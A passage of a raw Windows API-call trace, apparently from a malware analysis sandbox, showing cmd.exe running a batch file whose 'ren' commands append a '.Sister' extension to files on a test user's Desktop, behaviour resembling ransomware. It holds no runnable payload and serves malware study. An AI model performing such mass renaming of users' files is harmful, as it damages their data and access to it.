lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0154.159] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66d10, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d43090 [0154.159] FindClose (in: hFindFile=0x21ed8d43090 | out: hFindFile=0x21ed8d43090) returned 1 [0154.160] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66d10, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d42d90 [0154.160] FindClose (in: hFindFile=0x21ed8d42d90 | out: hFindFile=0x21ed8d42d90) returned 1 [0154.160] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x867d471f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x867d471f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66d10, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d43090 [0154.160] FindClose (in: hFindFile=0x21ed8d43090 | out: hFindFile=0x21ed8d43090) returned 1 [0154.160] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x867d471f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x867d471f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd8d66d10, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0154.160] malloc (_Size=0x1ff9c) returned 0x21ed921fd30 [0154.161] ??_V@YAXPEAX@Z () returned 0x21ed921fd30 [0154.162] GetProcessHeap () returned 0x21ed8c70000 [0154.162] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67c30 [0154.162] ??_V@YAXPEAX@Z () returned 0x1 [0154.162] ??_V@YAXPEAX@Z () returned 0x1 [0154.162] GetProcessHeap () returned 0x21ed8c70000 [0154.162] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9377f40, Size=0x490) returned 0x21ed9377f40 [0154.162] GetProcessHeap () returned 0x21ed8c70000 [0154.162] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9377f40) returned 0x490 [0154.162] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0154.162] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.162] GetFileType (hFile=0x50) returned 0x2 [0154.162] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0154.162] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0154.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.206] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0154.299] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0154.299] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0154.299] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0154.299] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.299] GetFileType (hFile=0x50) returned 0x2 [0154.299] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0154.299] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0154.373] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.373] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0154.448] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.448] GetFileType (hFile=0x50) returned 0x2 [0154.448] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0154.448] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0154.685] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.685] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9377f10*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed9377f10*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0154.778] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0154.778] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.778] GetFileType (hFile=0x50) returned 0x2 [0154.778] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0154.778] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0154.949] _get_osfhandle (_FileHandle=1) returned 0x50 [0154.949] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0155.121] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0155.121] _get_osfhandle (_FileHandle=1) returned 0x50 [0155.121] GetFileType (hFile=0x50) returned 0x2 [0155.121] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0155.121] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0155.206] _get_osfhandle (_FileHandle=1) returned 0x50 [0155.206] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0155.303] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0155.395] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0155.395] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0155.395] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0155.395] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0155.395] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0155.395] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0155.395] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0155.395] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0155.395] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0155.395] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0155.395] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0155.395] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0155.395] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0155.396] ??_V@YAXPEAX@Z () returned 0x1 [0155.396] GetProcessHeap () returned 0x21ed8c70000 [0155.396] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d64470 [0155.396] GetProcessHeap () returned 0x21ed8c70000 [0155.396] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d64470, Size=0x130) returned 0x21ed8d64470 [0155.396] GetProcessHeap () returned 0x21ed8c70000 [0155.396] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d64470) returned 0x130 [0155.396] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.396] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0155.396] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0155.396] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0155.396] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed91ffd80, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0155.398] ??_V@YAXPEAX@Z () returned 0x1 [0155.398] GetProcessHeap () returned 0x21ed8c70000 [0155.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62950 [0155.398] GetProcessHeap () returned 0x21ed8c70000 [0155.398] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed8d645b0 [0155.398] GetProcessHeap () returned 0x21ed8c70000 [0155.398] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d645b0, Size=0x130) returned 0x21ed8d645b0 [0155.398] GetProcessHeap () returned 0x21ed8c70000 [0155.398] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d645b0) returned 0x130 [0155.399] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0155.399] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0155.399] GetProcessHeap () returned 0x21ed8c70000 [0155.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d42d90 [0155.399] GetProcessHeap () returned 0x21ed8c70000 [0155.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed93741e0 [0155.399] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0155.399] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0155.399] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0155.399] GetLastError () returned 0x2 [0155.399] GetProcessHeap () returned 0x21ed8c70000 [0155.399] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9420dc0 [0155.399] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9420dd0 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0155.399] SetErrorMode (uMode=0x0) returned 0x0 [0155.399] SetErrorMode (uMode=0x1) returned 0x0 [0155.399] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed91ffd80, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0155.399] SetErrorMode (uMode=0x0) returned 0x1 [0155.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0155.400] GetProcessHeap () returned 0x21ed8c70000 [0155.400] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9373a90 [0155.400] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0155.400] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0155.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0155.400] GetLastError () returned 0x2 [0155.400] ??_V@YAXPEAX@Z () returned 0x1 [0155.400] malloc (_Size=0xffce) returned 0x21ed91ffd80 [0155.400] ??_V@YAXPEAX@Z () returned 0x21ed91ffd80 [0155.400] malloc (_Size=0xffce) returned 0x21ed920fd60 [0155.400] ??_V@YAXPEAX@Z () returned 0x21ed920fd60 [0155.400] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0155.400] GetLastError () returned 0x2 [0155.400] _get_osfhandle (_FileHandle=2) returned 0x54 [0155.400] GetFileType (hFile=0x54) returned 0x2 [0155.400] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0155.401] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0155.495] _get_osfhandle (_FileHandle=2) returned 0x54 [0155.495] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0155.593] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.593] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0155.593] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0155.701] longjmp () [0155.701] ??_V@YAXPEAX@Z () returned 0x1 [0155.701] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9bdbd0, ftCreationTime.dwHighDateTime=0x1d5ebdb, ftLastAccessTime.dwLowDateTime=0x2c541020, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x2c541020, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0xc828, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="Mhg3G6nMJa5mU0.mp4", cAlternateFileName="")) returned 1 [0155.701] GetProcessHeap () returned 0x21ed8c70000 [0155.701] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d63980, Size=0x2f0) returned 0x21ed8d646f0 [0155.701] GetProcessHeap () returned 0x21ed8c70000 [0155.701] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d646f0) returned 0x2f0 [0155.701] GetProcessHeap () returned 0x21ed8c70000 [0155.701] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9430db0 [0155.702] GetProcessHeap () returned 0x21ed8c70000 [0155.702] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9430db0, Size=0x30) returned 0x21ed9430db0 [0155.702] GetProcessHeap () returned 0x21ed8c70000 [0155.702] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9430db0) returned 0x30 [0155.702] GetProcessHeap () returned 0x21ed8c70000 [0155.702] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9430df0 [0155.702] malloc (_Size=0x1ff9c) returned 0x21ed921fd40 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.703] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8850 [0155.703] ??_V@YAXPEAX@Z () returned 0x1 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.703] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9430df0, Size=0x1a0) returned 0x21ed9430df0 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.703] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9430df0) returned 0x1a0 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.703] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9430fa0 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.703] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9430fa0, Size=0x290) returned 0x21ed9430fa0 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.703] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9430fa0) returned 0x290 [0155.703] GetProcessHeap () returned 0x21ed8c70000 [0155.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9431240 [0155.704] GetProcessHeap () returned 0x21ed8c70000 [0155.704] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9431240, Size=0x30) returned 0x21ed9431240 [0155.704] GetProcessHeap () returned 0x21ed8c70000 [0155.704] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9431240) returned 0x30 [0155.704] GetProcessHeap () returned 0x21ed8c70000 [0155.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed9431280 [0155.704] malloc (_Size=0x1ff9c) returned 0x21ed921fd40 [0155.704] GetProcessHeap () returned 0x21ed8c70000 [0155.704] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x36) returned 0x21ed8cc8c90 [0155.704] ??_V@YAXPEAX@Z () returned 0x1 [0155.704] malloc (_Size=0x1ff9c) returned 0x21ed921fd40 [0155.704] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d42f10 [0155.704] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0155.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d43090 [0155.705] FindClose (in: hFindFile=0x21ed8d43090 | out: hFindFile=0x21ed8d43090) returned 1 [0155.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x867d471f, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x867d471f, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x4, dwReserved1=0x80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d42f10 [0155.705] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0155.705] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\Mhg3G6nMJa5mU0.mp4", lpFindFileData=0xa6cf4fdef0 | out: lpFindFileData=0xa6cf4fdef0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xaf9bdbd0, ftCreationTime.dwHighDateTime=0x1d5ebdb, ftLastAccessTime.dwLowDateTime=0x2c541020, ftLastAccessTime.dwHighDateTime=0x1d5e64b, ftLastWriteTime.dwLowDateTime=0x2c541020, ftLastWriteTime.dwHighDateTime=0x1d5e64b, nFileSizeHigh=0x0, nFileSizeLow=0xc828, dwReserved0=0x4, dwReserved1=0x80, cFileName="Mhg3G6nMJa5mU0.mp4", cAlternateFileName="MHG3G6~1.MP4")) returned 0x21ed8d42f10 [0155.705] FindClose (in: hFindFile=0x21ed8d42f10 | out: hFindFile=0x21ed8d42f10) returned 1 [0155.706] _wcsnicmp (_String1="MHG3G6~1.MP4", _String2="Mhg3G6nMJa5mU0.mp4", _MaxCount=0x12) returned 16 [0155.706] malloc (_Size=0x1ff9c) returned 0x21ed923fcf0 [0155.706] ??_V@YAXPEAX@Z () returned 0x21ed923fcf0 [0155.708] GetProcessHeap () returned 0x21ed8c70000 [0155.708] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x2e) returned 0x21ed8cc8890 [0155.708] ??_V@YAXPEAX@Z () returned 0x1 [0155.708] ??_V@YAXPEAX@Z () returned 0x1 [0155.708] GetProcessHeap () returned 0x21ed8c70000 [0155.708] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9431280, Size=0x1a0) returned 0x21ed9431280 [0155.708] GetProcessHeap () returned 0x21ed8c70000 [0155.708] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed9431280) returned 0x1a0 [0155.708] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe2b8 | out: _Buffer="\r\n") returned 2 [0155.708] _get_osfhandle (_FileHandle=1) returned 0x50 [0155.708] GetFileType (hFile=0x50) returned 0x2 [0155.708] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0155.708] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe248 | out: lpMode=0xa6cf4fe248) returned 1 [0155.934] _get_osfhandle (_FileHandle=1) returned 0x50 [0155.934] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe288, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe288*=0x2) returned 1 [0156.000] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0156.000] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fe2c8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0156.001] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fe2c8 | out: _Buffer=">") returned 1 [0156.001] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.001] GetFileType (hFile=0x50) returned 0x2 [0156.001] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0156.001] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe278 | out: lpMode=0xa6cf4fe278) returned 1 [0156.125] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.125] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fe2b8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fe2b8*=0x18) returned 1 [0156.282] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.282] GetFileType (hFile=0x50) returned 0x2 [0156.282] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0156.282] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4e8 | out: lpMode=0xa6cf4fe4e8) returned 1 [0156.358] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.358] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed9430dc0*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe528, lpReserved=0x0 | out: lpBuffer=0x21ed9430dc0*, lpNumberOfCharsWritten=0xa6cf4fe528*=0x3) returned 1 [0156.485] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe528 | out: _Buffer=" \"Mhg3G6nMJa5mU0.mp4\" \"Mhg3G6nMJa5mU0.mp4.Sister\" ") returned 50 [0156.485] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.485] GetFileType (hFile=0x50) returned 0x2 [0156.486] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0156.486] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe4b8 | out: lpMode=0xa6cf4fe4b8) returned 1 [0156.658] _get_osfhandle (_FileHandle=1) returned 0x50 [0156.658] WriteConsoleW (in: 